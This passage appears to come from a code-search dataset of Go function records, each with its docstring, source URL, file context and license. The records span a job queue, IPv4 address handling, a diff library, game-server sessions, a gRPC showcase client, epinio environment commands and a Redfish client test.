m.testManagerStopped()
return err
}
func (m *Manager) Add(ctx context.Context, job *Job) error {
if job.Topic == "" {
return errors.New("jobqueue: no topic specified")
}
m.mu.Lock()
defer m.mu.Unlock()
_, found := m.tm[job.Topic]
if !found {
return fmt.Errorf("jobqueue: topic %s not registered", job.Topic)
}
job.ID = uuid.New().String()
job.State = Waiting
job.Retry = 0
job.Priority = -time.Now().UnixNano()
job.Created = time.Now().UnixNano()
err := m.st.Create(ctx, job)
if err != nil {
return err
}
m.testJobAdded()
return nil
}
func (m *Manager) Stats(ctx context.Context, request *StatsRequest) (*Stats, error) {
return m.st.Stats(ctx, request)
}
func (m *Manager) Lookup(ctx context.Context, id string) (*Job, error) {
return m.st.Lookup(ctx, id)
}
func (m *Manager) LookupByCorrelationID(ctx context.Context, correlationID string) ([]*Job, error) {
return m.st.LookupByCorrelationID(ctx, correlationID)
}
func (m *Manager) List(ctx context.Context, request *ListRequest) (*ListResponse, error) {
if request.Limit < 0 {
request.Limit = 0
} else if request.Limit == 0 {
request.Limit = 10
}
return m.st.List(ctx, request)
} | MIT License |
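A lifecycle sketch for the Manager above, using only options and methods visible in this file (SetConcurrency, Register, Start, Add, Close). The Processor type itself is not part of the snippet, so the processor value is left abstract instead of guessing its signature; the import path follows the repository shown in the record (github.com/olivere/jobqueue).

package main

import (
	"context"
	"log"

	"github.com/olivere/jobqueue"
)

func main() {
	// Allow at most two rank-0 jobs to run concurrently; the scheduler shown
	// above checks working[rank] against this limit once per second.
	m := jobqueue.New(jobqueue.SetConcurrency(0, 2))

	// Assumption: supply a value that satisfies jobqueue.Processor here; its
	// definition is outside the snippet above.
	var process jobqueue.Processor
	if err := m.Register("emails", process); err != nil {
		log.Fatal(err)
	}

	if err := m.Start(); err != nil {
		log.Fatal(err)
	}
	defer m.Close()

	// Add validates the topic, assigns an ID, and stores the job as Waiting;
	// the schedule goroutine later marks it Working and hands it to a worker.
	if err := m.Add(context.Background(), &jobqueue.Job{Topic: "emails"}); err != nil {
		log.Fatal(err)
	}
}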
nike-inc/cerberus-go-client | v3/vendor/github.com/hashicorp/go-sockaddr/ipv4addr.go | Equal | go | func (ipv4 IPv4Addr) Equal(sa SockAddr) bool {
ipv4b, ok := sa.(IPv4Addr)
if !ok {
return false
}
if ipv4.Port != ipv4b.Port {
return false
}
if ipv4.Address != ipv4b.Address {
return false
}
if ipv4.NetIPNet().String() != ipv4b.NetIPNet().String() {
return false
}
return true
} | Equal returns true if a SockAddr is equal to the receiving IPv4Addr. | https://github.com/nike-inc/cerberus-go-client/blob/7750cd9f0754d44b60c866537fb2030bb7662fe5/v3/vendor/github.com/hashicorp/go-sockaddr/ipv4addr.go#L297-L316 | package sockaddr
import (
"encoding/binary"
"fmt"
"net"
"regexp"
"strconv"
"strings"
)
type (
IPv4Address uint32
IPv4Network uint32
IPv4Mask uint32
)
const IPv4HostMask = IPv4Mask(0xffffffff)
var ipv4AddrAttrMap map[AttrName]func(IPv4Addr) string
var ipv4AddrAttrs []AttrName
var trailingHexNetmaskRE *regexp.Regexp
type IPv4Addr struct {
IPAddr
Address IPv4Address
Mask IPv4Mask
Port IPPort
}
func init() {
ipv4AddrInit()
trailingHexNetmaskRE = regexp.MustCompile(`/([0f]{8})$`)
}
func NewIPv4Addr(ipv4Str string) (IPv4Addr, error) {
trailingHexNetmaskRe := trailingHexNetmaskRE.Copy()
if match := trailingHexNetmaskRe.FindStringIndex(ipv4Str); match != nil {
ipv4Str = ipv4Str[:match[0]]
}
ipAddr, network, err := net.ParseCIDR(ipv4Str)
if err == nil {
ipv4 := ipAddr.To4()
if ipv4 == nil {
return IPv4Addr{}, fmt.Errorf("Unable to convert %s to an IPv4 address", ipv4Str)
}
netmaskSepPos := strings.LastIndexByte(ipv4Str, '/')
if netmaskSepPos != -1 && netmaskSepPos+1 < len(ipv4Str) {
netMask, err := strconv.ParseUint(ipv4Str[netmaskSepPos+1:], 10, 8)
if err != nil {
return IPv4Addr{}, fmt.Errorf("Unable to convert %s to an IPv4 address: unable to parse CIDR netmask: %v", ipv4Str, err)
} else if netMask > 128 {
return IPv4Addr{}, fmt.Errorf("Unable to convert %s to an IPv4 address: invalid CIDR netmask", ipv4Str)
}
if netMask >= 96 {
network.Mask = net.CIDRMask(int(netMask-96), IPv4len*8)
}
}
ipv4Addr := IPv4Addr{
Address: IPv4Address(binary.BigEndian.Uint32(ipv4)),
Mask: IPv4Mask(binary.BigEndian.Uint32(network.Mask)),
}
return ipv4Addr, nil
}
tcpAddr, err := net.ResolveTCPAddr("tcp4", ipv4Str)
if err == nil {
ipv4 := tcpAddr.IP.To4()
if ipv4 == nil {
return IPv4Addr{}, fmt.Errorf("Unable to resolve %+q as an IPv4 address", ipv4Str)
}
ipv4Uint32 := binary.BigEndian.Uint32(ipv4)
ipv4Addr := IPv4Addr{
Address: IPv4Address(ipv4Uint32),
Mask: IPv4HostMask,
Port: IPPort(tcpAddr.Port),
}
return ipv4Addr, nil
}
ip := net.ParseIP(ipv4Str)
if ip != nil {
ipv4 := ip.To4()
if ipv4 == nil {
return IPv4Addr{}, fmt.Errorf("Unable to string convert %+q to an IPv4 address", ipv4Str)
}
ipv4Uint32 := binary.BigEndian.Uint32(ipv4)
ipv4Addr := IPv4Addr{
Address: IPv4Address(ipv4Uint32),
Mask: IPv4HostMask,
}
return ipv4Addr, nil
}
return IPv4Addr{}, fmt.Errorf("Unable to parse %+q to an IPv4 address: %v", ipv4Str, err)
}
func (ipv4 IPv4Addr) AddressBinString() string {
return fmt.Sprintf("%032s", strconv.FormatUint(uint64(ipv4.Address), 2))
}
func (ipv4 IPv4Addr) AddressHexString() string {
return fmt.Sprintf("%08s", strconv.FormatUint(uint64(ipv4.Address), 16))
}
func (ipv4 IPv4Addr) Broadcast() IPAddr {
return IPv4Addr{
Address: IPv4Address(ipv4.BroadcastAddress()),
Mask: IPv4HostMask,
}
}
func (ipv4 IPv4Addr) BroadcastAddress() IPv4Network {
return IPv4Network(uint32(ipv4.Address)&uint32(ipv4.Mask) | ^uint32(ipv4.Mask))
}
func (ipv4 IPv4Addr) CmpAddress(sa SockAddr) int {
ipv4b, ok := sa.(IPv4Addr)
if !ok {
return sortDeferDecision
}
switch {
case ipv4.Address == ipv4b.Address:
return sortDeferDecision
case ipv4.Address < ipv4b.Address:
return sortReceiverBeforeArg
default:
return sortArgBeforeReceiver
}
}
func (ipv4 IPv4Addr) CmpPort(sa SockAddr) int {
var saPort IPPort
switch v := sa.(type) {
case IPv4Addr:
saPort = v.Port
case IPv6Addr:
saPort = v.Port
default:
return sortDeferDecision
}
switch {
case ipv4.Port == saPort:
return sortDeferDecision
case ipv4.Port < saPort:
return sortReceiverBeforeArg
default:
return sortArgBeforeReceiver
}
}
func (ipv4 IPv4Addr) CmpRFC(rfcNum uint, sa SockAddr) int {
recvInRFC := IsRFC(rfcNum, ipv4)
ipv4b, ok := sa.(IPv4Addr)
if !ok {
if recvInRFC {
return sortReceiverBeforeArg
} else {
return sortDeferDecision
}
}
argInRFC := IsRFC(rfcNum, ipv4b)
switch {
case (recvInRFC && argInRFC), (!recvInRFC && !argInRFC):
return sortDeferDecision
case recvInRFC && !argInRFC:
return sortReceiverBeforeArg
default:
return sortArgBeforeReceiver
}
}
func (ipv4 IPv4Addr) Contains(sa SockAddr) bool {
ipv4b, ok := sa.(IPv4Addr)
if !ok {
return false
}
return ipv4.ContainsNetwork(ipv4b)
}
func (ipv4 IPv4Addr) ContainsAddress(x IPv4Address) bool {
return IPv4Address(ipv4.NetworkAddress()) <= x &&
IPv4Address(ipv4.BroadcastAddress()) >= x
}
func (ipv4 IPv4Addr) ContainsNetwork(x IPv4Addr) bool {
return ipv4.NetworkAddress() <= x.NetworkAddress() &&
ipv4.BroadcastAddress() >= x.BroadcastAddress()
}
func (ipv4 IPv4Addr) DialPacketArgs() (network, dialArgs string) {
if ipv4.Mask != IPv4HostMask || ipv4.Port == 0 {
return "udp4", ""
}
return "udp4", fmt.Sprintf("%s:%d", ipv4.NetIP().String(), ipv4.Port)
}
func (ipv4 IPv4Addr) DialStreamArgs() (network, dialArgs string) {
if ipv4.Mask != IPv4HostMask || ipv4.Port == 0 {
return "tcp4", ""
}
return "tcp4", fmt.Sprintf("%s:%d", ipv4.NetIP().String(), ipv4.Port)
} | Apache License 2.0 |
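A small usage sketch for the IPv4Addr helpers above, built only from constructors and methods visible in this file; the import path is the upstream one that the vendor directory in the record mirrors (github.com/hashicorp/go-sockaddr).

package main

import (
	"fmt"
	"log"

	sockaddr "github.com/hashicorp/go-sockaddr"
)

func main() {
	// A /24 network and a host address with a port inside that network.
	network, err := sockaddr.NewIPv4Addr("192.168.1.0/24")
	if err != nil {
		log.Fatal(err)
	}
	host, err := sockaddr.NewIPv4Addr("192.168.1.10:8080")
	if err != nil {
		log.Fatal(err)
	}

	// Equal compares address, port, and netmask, so a host and its network differ.
	fmt.Println(host.Equal(network)) // false: ports and masks differ

	// Contains works on the network/broadcast range computed from the mask.
	fmt.Println(network.Contains(host)) // true

	same, _ := sockaddr.NewIPv4Addr("192.168.1.10:8080")
	fmt.Println(host.Equal(same)) // true: same address, port, and mask
}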
shibukawa/cdiff | diff.go | Diff | go | func Diff(oldText, newText string, diffType DiffType) Result {
if diffType == LineByLine {
return lineDiff(oldText, newText)
}
return wordDiff(oldText, newText)
} | Diff computes the difference between oldText and newText, line by line or word by word depending on diffType | https://github.com/shibukawa/cdiff/blob/cdef086f82dad20ecc67d3528d3a90ffedd01f2b/diff.go#L225-L230 | package cdiff
import (
"strings"
"github.com/sergi/go-diff/diffmatchpatch"
)
type blockDiff struct {
Ope Ope
Text string
NewLineNumber int
OldLineNumber int
}
func calcBlockDiff(oldText, newText string) []blockDiff {
dmp := diffmatchpatch.New()
a, b, c := dmp.DiffLinesToChars(oldText, newText)
diffs := dmp.DiffMain(a, b, true)
diffByLines := dmp.DiffCharsToLines(diffs, c)
result := make([]blockDiff, len(diffByLines))
newLineNum := 1
oldLineNum := 1
for i, diff := range diffByLines {
f := blockDiff{
Ope: Ope(diff.Type),
Text: diff.Text,
NewLineNumber: -1,
OldLineNumber: -1,
}
inc := strings.Count(diff.Text, "\n")
switch f.Ope {
case Insert:
f.NewLineNumber = newLineNum
newLineNum += inc
case Delete:
f.OldLineNumber = oldLineNum
oldLineNum += inc
case Keep:
f.NewLineNumber = newLineNum
f.OldLineNumber = oldLineNum
newLineNum += inc
oldLineNum += inc
}
result[i] = f
}
return result
}
type Fragment struct {
Text string
Changed bool
}
type Line struct {
Ope Ope
NewLineNumber int
OldLineNumber int
Fragments []Fragment
}
func (d Line) String() string {
var builder strings.Builder
for _, f := range d.Fragments {
builder.WriteString(f.Text)
}
return builder.String()
}
type Result struct {
Lines []Line
}
func (r Result) String() string {
var builder strings.Builder
for _, l := range r.Lines {
switch l.Ope {
case Insert:
builder.WriteString("+ ")
case Delete:
builder.WriteString("- ")
case Keep:
builder.WriteString(" ")
}
builder.WriteString(l.String())
builder.WriteString("\n")
}
return builder.String()
}
func lineDiff(oldText, newText string) Result {
var result Result
blocks := calcBlockDiff(oldText, newText)
for _, block := range blocks {
lines := strings.Split(block.Text, "\n")
for i, line := range lines[:len(lines)-1] {
lineObj := Line{
Ope: block.Ope,
Fragments: []Fragment{
{
Text: line,
},
},
OldLineNumber: -1,
NewLineNumber: -1,
}
if block.NewLineNumber > 0 {
lineObj.NewLineNumber = block.NewLineNumber + i
}
if block.OldLineNumber > 0 {
lineObj.OldLineNumber = block.OldLineNumber + i
}
result.Lines = append(result.Lines, lineObj)
}
}
return result
}
func splitDiffsByNewLine(diffs []diffmatchpatch.Diff) []diffmatchpatch.Diff {
result := make([]diffmatchpatch.Diff, 0, len(diffs))
for _, diff := range diffs {
texts := strings.Split(diff.Text, "\n")
for i, text := range texts {
if i != len(texts)-1 {
text += "\n"
}
if text != "" {
result = append(result, diffmatchpatch.Diff{
Text: text,
Type: diff.Type,
})
}
}
}
return result
}
func wordDiff(oldText, newText string) Result {
var result Result
blocks := calcBlockDiff(oldText, newText)
dmp := diffmatchpatch.New()
for i := 0; i < len(blocks); i++ {
if i != len(blocks)-1 && blocks[i].Ope == Delete && blocks[i+1].Ope == Insert {
diffs := dmp.DiffMain(blocks[i].Text, blocks[i+1].Text, true)
diffs = splitDiffsByNewLine(diffs)
var fragments []Fragment
oldLineNumber := blocks[i].OldLineNumber
newLineNumber := blocks[i].NewLineNumber
for _, diff := range diffs {
if diff.Type == diffmatchpatch.DiffInsert {
continue
}
hasNewLine := strings.HasSuffix(diff.Text, "\n")
fragments = append(fragments, Fragment{
Changed: diff.Type == diffmatchpatch.DiffDelete,
Text: strings.TrimRight(diff.Text, "\n"),
})
if hasNewLine {
result.Lines = append(result.Lines, Line{
Ope: Delete,
NewLineNumber: -1,
OldLineNumber: oldLineNumber,
Fragments: fragments,
})
fragments = nil
oldLineNumber++
}
}
fragments = nil
oldLineNumber = blocks[i+1].OldLineNumber
newLineNumber = blocks[i+1].NewLineNumber
for _, diff := range diffs {
if diff.Type == diffmatchpatch.DiffDelete {
continue
}
hasNewLine := strings.HasSuffix(diff.Text, "\n")
fragments = append(fragments, Fragment{
Changed: diff.Type == diffmatchpatch.DiffInsert,
Text: strings.TrimRight(diff.Text, "\n"),
})
if hasNewLine {
result.Lines = append(result.Lines, Line{
Ope: Insert,
NewLineNumber: newLineNumber,
OldLineNumber: -1,
Fragments: fragments,
})
fragments = nil
newLineNumber++
}
}
i++
} else {
block := blocks[i]
lines := strings.Split(block.Text, "\n")
for i, line := range lines[:len(lines)-1] {
lineObj := Line{
Ope: block.Ope,
Fragments: []Fragment{
{
Text: line,
Changed: block.Ope != Keep,
},
},
OldLineNumber: -1,
NewLineNumber: -1,
}
if block.NewLineNumber > 0 {
lineObj.NewLineNumber = block.NewLineNumber + i
}
if block.OldLineNumber > 0 {
lineObj.OldLineNumber = block.OldLineNumber + i
}
result.Lines = append(result.Lines, lineObj)
}
}
}
return result
} | Apache License 2.0 |
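A short sketch of calling Diff with the LineByLine mode shown above and consuming both the string form and the structured Lines; the import path comes from the record's URL (github.com/shibukawa/cdiff).

package main

import (
	"fmt"

	"github.com/shibukawa/cdiff"
)

func main() {
	oldText := "line one\nline two\nline three\n"
	newText := "line one\nline 2\nline three\n"

	// LineByLine produces one Line per source line; Result.String() renders
	// them with "+ ", "- ", or two-space prefixes.
	result := cdiff.Diff(oldText, newText, cdiff.LineByLine)
	fmt.Print(result.String())

	// The structured form is available too, e.g. for custom rendering.
	for _, line := range result.Lines {
		if line.Ope == cdiff.Insert {
			fmt.Printf("inserted at new line %d: %q\n", line.NewLineNumber, line.String())
		}
	}
}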
bytemode/pitaya-notes | session/session.go | GetSessionByUID | go | func GetSessionByUID(uid string) *Session {
if val, ok := sessionsByUID.Load(uid); ok {
return val.(*Session)
}
return nil
} | GetSessionByUID returns the session bound to the given user id, or nil if none is bound | https://github.com/bytemode/pitaya-notes/blob/8b5ff115bc18acdc7741ec4d737b495616c89042/session/session.go#L136-L142 | package session
import (
"context"
"encoding/json"
"net"
"reflect"
"sync"
"sync/atomic"
"time"
"github.com/golang/protobuf/proto"
nats "github.com/nats-io/nats.go"
"github.com/topfreegames/pitaya/constants"
"github.com/topfreegames/pitaya/logger"
"github.com/topfreegames/pitaya/protos"
)
type NetworkEntity interface {
Push(route string, v interface{}) error
ResponseMID(ctx context.Context, mid uint, v interface{}, isError ...bool) error
Close() error
Kick(ctx context.Context) error
RemoteAddr() net.Addr
SendRequest(ctx context.Context, serverID, route string, v interface{}) (*protos.Response, error)
}
var (
sessionBindCallbacks = make([]func(ctx context.Context, s *Session) error, 0)
afterBindCallbacks = make([]func(ctx context.Context, s *Session) error, 0)
SessionCloseCallbacks = make([]func(s *Session), 0)
sessionsByUID sync.Map
sessionsByID sync.Map
sessionIDSvc = newSessionIDService()
SessionCount int64
)
type HandshakeClientData struct {
Platform string `json:"platform"`
LibVersion string `json:"libVersion"`
BuildNumber string `json:"clientBuildNumber"`
Version string `json:"clientVersion"`
}
type HandshakeData struct {
Sys HandshakeClientData `json:"sys"`
User map[string]interface{} `json:"user,omitempty"`
}
type Session struct {
sync.RWMutex
id int64
uid string
lastTime int64
entity NetworkEntity
data map[string]interface{}
handshakeData *HandshakeData
encodedData []byte
OnCloseCallbacks []func()
IsFrontend bool
frontendID string
frontendSessionID int64
Subscriptions []*nats.Subscription
}
type sessionIDService struct {
sid int64
}
func newSessionIDService() *sessionIDService {
return &sessionIDService{
sid: 0,
}
}
func (c *sessionIDService) sessionID() int64 {
return atomic.AddInt64(&c.sid, 1)
}
func New(entity NetworkEntity, frontend bool, UID ...string) *Session {
s := &Session{
id: sessionIDSvc.sessionID(),
entity: entity,
data: make(map[string]interface{}),
handshakeData: nil,
lastTime: time.Now().Unix(),
OnCloseCallbacks: []func(){},
IsFrontend: frontend,
}
if frontend {
sessionsByID.Store(s.id, s)
atomic.AddInt64(&SessionCount, 1)
}
if len(UID) > 0 {
s.uid = UID[0]
}
return s
} | MIT License |
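A tiny sketch of the lookup pattern GetSessionByUID supports; it assumes a session was bound to the UID elsewhere (binding is not part of this snippet) and that the package is imported under its topfreegames path, which matches the file's own imports.

package main

import (
	"fmt"

	"github.com/topfreegames/pitaya/session" // assumed import path, matching this file's own imports
)

// isOnline is a hypothetical helper built only on what the snippet shows:
// GetSessionByUID returns nil when no session is bound to the given UID.
func isOnline(uid string) bool {
	return session.GetSessionByUID(uid) != nil
}

func main() {
	fmt.Println(isOnline("user-42")) // false unless a frontend bound this UID earlier
}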
googleapis/gapic-showcase | client/echo_client.go | GetLocation | go | func (c *EchoClient) GetLocation(ctx context.Context, req *locationpb.GetLocationRequest, opts ...gax.CallOption) (*locationpb.Location, error) {
return c.internalClient.GetLocation(ctx, req, opts...)
} | GetLocation is a utility method from google.cloud.location.Locations. | https://github.com/googleapis/gapic-showcase/blob/e4801bdf730a01e8e3e89889ff6729e479e1229b/client/echo_client.go#L276-L278 | package client
import (
"context"
"math"
"sort"
"time"
"cloud.google.com/go/longrunning"
lroauto "cloud.google.com/go/longrunning/autogen"
genprotopb "github.com/googleapis/gapic-showcase/server/genproto"
gax "github.com/googleapis/gax-go/v2"
"google.golang.org/api/iterator"
"google.golang.org/api/option"
"google.golang.org/api/option/internaloption"
gtransport "google.golang.org/api/transport/grpc"
locationpb "google.golang.org/genproto/googleapis/cloud/location"
iampb "google.golang.org/genproto/googleapis/iam/v1"
longrunningpb "google.golang.org/genproto/googleapis/longrunning"
"google.golang.org/grpc"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/metadata"
"google.golang.org/protobuf/proto"
)
var newEchoClientHook clientHook
type EchoCallOptions struct {
Echo []gax.CallOption
Expand []gax.CallOption
Collect []gax.CallOption
Chat []gax.CallOption
PagedExpand []gax.CallOption
PagedExpandLegacy []gax.CallOption
PagedExpandLegacyMapped []gax.CallOption
Wait []gax.CallOption
Block []gax.CallOption
ListLocations []gax.CallOption
GetLocation []gax.CallOption
SetIamPolicy []gax.CallOption
GetIamPolicy []gax.CallOption
TestIamPermissions []gax.CallOption
ListOperations []gax.CallOption
GetOperation []gax.CallOption
DeleteOperation []gax.CallOption
CancelOperation []gax.CallOption
}
func defaultEchoGRPCClientOptions() []option.ClientOption {
return []option.ClientOption{
internaloption.WithDefaultEndpoint("localhost:7469"),
internaloption.WithDefaultMTLSEndpoint("localhost:7469"),
internaloption.WithDefaultAudience("https://localhost/"),
internaloption.WithDefaultScopes(DefaultAuthScopes()...),
internaloption.EnableJwtWithScope(),
option.WithGRPCDialOption(grpc.WithDisableServiceConfig()),
option.WithGRPCDialOption(grpc.WithDefaultCallOptions(
grpc.MaxCallRecvMsgSize(math.MaxInt32))),
}
}
func defaultEchoCallOptions() *EchoCallOptions {
return &EchoCallOptions{
Echo: []gax.CallOption{
gax.WithRetry(func() gax.Retryer {
return gax.OnCodes([]codes.Code{
codes.Unavailable,
codes.Unknown,
}, gax.Backoff{
Initial: 100 * time.Millisecond,
Max: 3000 * time.Millisecond,
Multiplier: 2.00,
})
}),
},
Expand: []gax.CallOption{
gax.WithRetry(func() gax.Retryer {
return gax.OnCodes([]codes.Code{
codes.Unavailable,
codes.Unknown,
}, gax.Backoff{
Initial: 100 * time.Millisecond,
Max: 3000 * time.Millisecond,
Multiplier: 2.00,
})
}),
},
Collect: []gax.CallOption{},
Chat: []gax.CallOption{},
PagedExpand: []gax.CallOption{
gax.WithRetry(func() gax.Retryer {
return gax.OnCodes([]codes.Code{
codes.Unavailable,
codes.Unknown,
}, gax.Backoff{
Initial: 100 * time.Millisecond,
Max: 3000 * time.Millisecond,
Multiplier: 2.00,
})
}),
},
PagedExpandLegacy: []gax.CallOption{},
PagedExpandLegacyMapped: []gax.CallOption{},
Wait: []gax.CallOption{},
Block: []gax.CallOption{},
ListLocations: []gax.CallOption{},
GetLocation: []gax.CallOption{},
SetIamPolicy: []gax.CallOption{},
GetIamPolicy: []gax.CallOption{},
TestIamPermissions: []gax.CallOption{},
ListOperations: []gax.CallOption{},
GetOperation: []gax.CallOption{},
DeleteOperation: []gax.CallOption{},
CancelOperation: []gax.CallOption{},
}
}
type internalEchoClient interface {
Close() error
setGoogleClientInfo(...string)
Connection() *grpc.ClientConn
Echo(context.Context, *genprotopb.EchoRequest, ...gax.CallOption) (*genprotopb.EchoResponse, error)
Expand(context.Context, *genprotopb.ExpandRequest, ...gax.CallOption) (genprotopb.Echo_ExpandClient, error)
Collect(context.Context, ...gax.CallOption) (genprotopb.Echo_CollectClient, error)
Chat(context.Context, ...gax.CallOption) (genprotopb.Echo_ChatClient, error)
PagedExpand(context.Context, *genprotopb.PagedExpandRequest, ...gax.CallOption) *EchoResponseIterator
PagedExpandLegacy(context.Context, *genprotopb.PagedExpandLegacyRequest, ...gax.CallOption) *EchoResponseIterator
PagedExpandLegacyMapped(context.Context, *genprotopb.PagedExpandRequest, ...gax.CallOption) *PagedExpandResponseListPairIterator
Wait(context.Context, *genprotopb.WaitRequest, ...gax.CallOption) (*WaitOperation, error)
WaitOperation(name string) *WaitOperation
Block(context.Context, *genprotopb.BlockRequest, ...gax.CallOption) (*genprotopb.BlockResponse, error)
ListLocations(context.Context, *locationpb.ListLocationsRequest, ...gax.CallOption) *LocationIterator
GetLocation(context.Context, *locationpb.GetLocationRequest, ...gax.CallOption) (*locationpb.Location, error)
SetIamPolicy(context.Context, *iampb.SetIamPolicyRequest, ...gax.CallOption) (*iampb.Policy, error)
GetIamPolicy(context.Context, *iampb.GetIamPolicyRequest, ...gax.CallOption) (*iampb.Policy, error)
TestIamPermissions(context.Context, *iampb.TestIamPermissionsRequest, ...gax.CallOption) (*iampb.TestIamPermissionsResponse, error)
ListOperations(context.Context, *longrunningpb.ListOperationsRequest, ...gax.CallOption) *OperationIterator
GetOperation(context.Context, *longrunningpb.GetOperationRequest, ...gax.CallOption) (*longrunningpb.Operation, error)
DeleteOperation(context.Context, *longrunningpb.DeleteOperationRequest, ...gax.CallOption) error
CancelOperation(context.Context, *longrunningpb.CancelOperationRequest, ...gax.CallOption) error
}
type EchoClient struct {
internalClient internalEchoClient
CallOptions *EchoCallOptions
LROClient *lroauto.OperationsClient
}
func (c *EchoClient) Close() error {
return c.internalClient.Close()
}
func (c *EchoClient) setGoogleClientInfo(keyval ...string) {
c.internalClient.setGoogleClientInfo(keyval...)
}
func (c *EchoClient) Connection() *grpc.ClientConn {
return c.internalClient.Connection()
}
func (c *EchoClient) Echo(ctx context.Context, req *genprotopb.EchoRequest, opts ...gax.CallOption) (*genprotopb.EchoResponse, error) {
return c.internalClient.Echo(ctx, req, opts...)
}
func (c *EchoClient) Expand(ctx context.Context, req *genprotopb.ExpandRequest, opts ...gax.CallOption) (genprotopb.Echo_ExpandClient, error) {
return c.internalClient.Expand(ctx, req, opts...)
}
func (c *EchoClient) Collect(ctx context.Context, opts ...gax.CallOption) (genprotopb.Echo_CollectClient, error) {
return c.internalClient.Collect(ctx, opts...)
}
func (c *EchoClient) Chat(ctx context.Context, opts ...gax.CallOption) (genprotopb.Echo_ChatClient, error) {
return c.internalClient.Chat(ctx, opts...)
}
func (c *EchoClient) PagedExpand(ctx context.Context, req *genprotopb.PagedExpandRequest, opts ...gax.CallOption) *EchoResponseIterator {
return c.internalClient.PagedExpand(ctx, req, opts...)
}
func (c *EchoClient) PagedExpandLegacy(ctx context.Context, req *genprotopb.PagedExpandLegacyRequest, opts ...gax.CallOption) *EchoResponseIterator {
return c.internalClient.PagedExpandLegacy(ctx, req, opts...)
}
func (c *EchoClient) PagedExpandLegacyMapped(ctx context.Context, req *genprotopb.PagedExpandRequest, opts ...gax.CallOption) *PagedExpandResponseListPairIterator {
return c.internalClient.PagedExpandLegacyMapped(ctx, req, opts...)
}
func (c *EchoClient) Wait(ctx context.Context, req *genprotopb.WaitRequest, opts ...gax.CallOption) (*WaitOperation, error) {
return c.internalClient.Wait(ctx, req, opts...)
}
func (c *EchoClient) WaitOperation(name string) *WaitOperation {
return c.internalClient.WaitOperation(name)
}
func (c *EchoClient) Block(ctx context.Context, req *genprotopb.BlockRequest, opts ...gax.CallOption) (*genprotopb.BlockResponse, error) {
return c.internalClient.Block(ctx, req, opts...)
}
func (c *EchoClient) ListLocations(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) *LocationIterator {
return c.internalClient.ListLocations(ctx, req, opts...)
} | Apache License 2.0 |
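A minimal call sketch for GetLocation. NewEchoClient is the package's generated constructor and is not shown in the excerpt above, so treat its exact options as an assumption; the resource name below is hypothetical.

package main

import (
	"context"
	"fmt"
	"log"

	showcase "github.com/googleapis/gapic-showcase/client"
	locationpb "google.golang.org/genproto/googleapis/cloud/location"
)

func main() {
	ctx := context.Background()

	// Generated constructor from the same package (not part of the snippet above).
	c, err := showcase.NewEchoClient(ctx)
	if err != nil {
		log.Fatal(err)
	}
	defer c.Close()

	loc, err := c.GetLocation(ctx, &locationpb.GetLocationRequest{
		Name: "projects/showcase/locations/us-central1", // hypothetical resource name
	})
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(loc.GetDisplayName())
}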
epinio/epinio | internal/cli/usercmd/env.go | EnvMatching | go | func (c *EpinioClient) EnvMatching(ctx context.Context, appName, prefix string) []string {
log := c.Log.WithName("Env")
log.Info("start")
defer log.Info("return")
resp, err := c.API.EnvMatch(c.Config.Org, appName, prefix)
if err != nil {
return []string{}
}
return resp.Names
} | EnvMatching retrieves the names of the specified application's environment variables that match the given prefix | https://github.com/epinio/epinio/blob/de61af94fdad363d030828c72c4c2f469364c234/internal/cli/usercmd/env.go#L128-L140 | package usercmd
import (
"context"
"github.com/epinio/epinio/pkg/api/core/v1/models"
)
func (c *EpinioClient) EnvList(ctx context.Context, appName string) error {
log := c.Log.WithName("EnvList")
log.Info("start")
defer log.Info("return")
c.ui.Note().
WithStringValue("Namespace", c.Config.Org).
WithStringValue("Application", appName).
Msg("Show Application Environment")
if err := c.TargetOk(); err != nil {
return err
}
eVariables, err := c.API.EnvList(c.Config.Org, appName)
if err != nil {
return err
}
msg := c.ui.Success().WithTable("Variable", "Value")
for _, ev := range eVariables.List() {
msg = msg.WithTableRow(ev.Name, ev.Value)
}
msg.Msg("Ok")
return nil
}
func (c *EpinioClient) EnvSet(ctx context.Context, appName, envName, envValue string) error {
log := c.Log.WithName("Env")
log.Info("start")
defer log.Info("return")
c.ui.Note().
WithStringValue("Namespace", c.Config.Org).
WithStringValue("Application", appName).
WithStringValue("Variable", envName).
WithStringValue("Value", envValue).
Msg("Extend or modify application environment")
if err := c.TargetOk(); err != nil {
return err
}
request := models.EnvVariableMap{}
request[envName] = envValue
_, err := c.API.EnvSet(request, c.Config.Org, appName)
if err != nil {
return err
}
c.ui.Success().Msg("OK")
return nil
}
func (c *EpinioClient) EnvShow(ctx context.Context, appName, envName string) error {
log := c.Log.WithName("Env")
log.Info("start")
defer log.Info("return")
c.ui.Note().
WithStringValue("Namespace", c.Config.Org).
WithStringValue("Application", appName).
WithStringValue("Variable", envName).
Msg("Show application environment variable")
if err := c.TargetOk(); err != nil {
return err
}
eVariable, err := c.API.EnvShow(c.Config.Org, appName, envName)
if err != nil {
return err
}
c.ui.Success().
WithStringValue("Value", eVariable.Value).
Msg("OK")
return nil
}
func (c *EpinioClient) EnvUnset(ctx context.Context, appName, envName string) error {
log := c.Log.WithName("Env")
log.Info("start")
defer log.Info("return")
c.ui.Note().
WithStringValue("Namespace", c.Config.Org).
WithStringValue("Application", appName).
WithStringValue("Variable", envName).
Msg("Remove from application environment")
if err := c.TargetOk(); err != nil {
return err
}
_, err := c.API.EnvUnset(c.Config.Org, appName, envName)
if err != nil {
return err
}
c.ui.Success().Msg("OK")
return nil
} | Apache License 2.0 |
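A sketch of using EnvMatching for CLI completion, written as a new file in the same usercmd package (the package is internal to the epinio module, so it cannot be imported from outside); the helper name is hypothetical.

package usercmd

import "context"

// completionHints is a hypothetical helper for shell completion. EnvMatching
// swallows API errors and returns an empty slice, so it is safe to call
// directly from completion code.
func completionHints(ctx context.Context, c *EpinioClient, appName, toComplete string) []string {
	return c.EnvMatching(ctx, appName, toComplete)
}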
stmcginnis/gofish | redfish/vlannetworkinterface_test.go | TestVlanNetworkInterface | go | func TestVlanNetworkInterface(t *testing.T) {
var result VLanNetworkInterface
err := json.NewDecoder(strings.NewReader(vlanNetworkInterfaceBody)).Decode(&result)
if err != nil {
t.Errorf("Error decoding JSON: %s", err)
}
if result.ID != "VlanNetworkInterface-1" {
t.Errorf("Received invalid ID: %s", result.ID)
}
if result.Name != "VlanNetworkInterfaceOne" {
t.Errorf("Received invalid name: %s", result.Name)
}
if !result.VLANEnable {
t.Error("VLAN should be enabled")
}
if result.VLANID != 200 {
